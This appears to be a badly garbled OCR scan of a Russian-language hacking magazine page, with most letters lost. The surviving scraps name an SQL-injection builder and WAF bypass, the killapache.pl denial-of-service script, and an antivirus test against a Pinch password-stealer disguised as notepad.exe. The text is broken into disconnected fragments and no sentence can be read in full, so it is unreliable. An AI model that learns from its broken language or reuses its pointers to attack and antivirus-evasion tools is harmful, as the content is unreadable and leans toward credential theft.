    n/- / n SQL-oa, n MaxSQLi Sytax Builde, n SQL-. n SQLi,

    n based. :

    ; n

    UNION; WAF n ;

    ; ;

    n ;

    n; , ;

    n stig itege based.

    , n , n , , n ,

    n SQL-.

    X-Tools

    killapache.pl Kigcope. n -- , n

    . S4luR4 + cURL l , n !, , . .).

    : G-

    lbyte gs) , n n.

    : VaZoNeZ

    URL: yazonez com/(;lage/

    -- --

    .llig.an.Q -t~

    : Windows 2000//2003 Server/ Vista/2008 Server/7

    n , n ,

    . , ,

    n . nn n Stegao, .

    n , : 1.

  • -

    . , ,

    - ,

    . - .

    notepad2.exe J

    " w n "0-m - ~ ~1*1

    Kpaw

    , , . , - , -. ;1.

    , -. n

    , . .

    , , ,

    -, . .

    , , . ,

    . ,

    .

    1. Kaspersky Crystal . . Kaspesky Cystal-

  • -

    - - i" Dr Web Scanner FLY-CODE, , , .

    3. ESET NOD32 Smart Security 5. - ESET NOD32 Smat Secuity 5. ,

    .. , , >,

    . 4. Avast! Free Antivirus.

    - Avast! F Antivius. n, ,

    .

    n n

    . , . - n .

    , n n n .

    n. n , API, n

    , n , .

    ,

    n LL-. , ,

    . , .

    Pinch. - ,

    . Toja-PSW.Wi32.LDPinch.dlt, D. Web- Tojan.Packed . 1197, NOD32- Win32/PSW.LdPinch.NMJ, Avast , Win32:LdPinch-NO [j]. ,

    n otepad.exe. , .

    ii:Wi~ .

    MZ- -, . - - otepad.exe. - , ,

    I- .

    Kaspesky Cistal. - . > . NOD32 Smat Secuity , Win32/PSW.LdPinch.NMJ.

    Avast , , .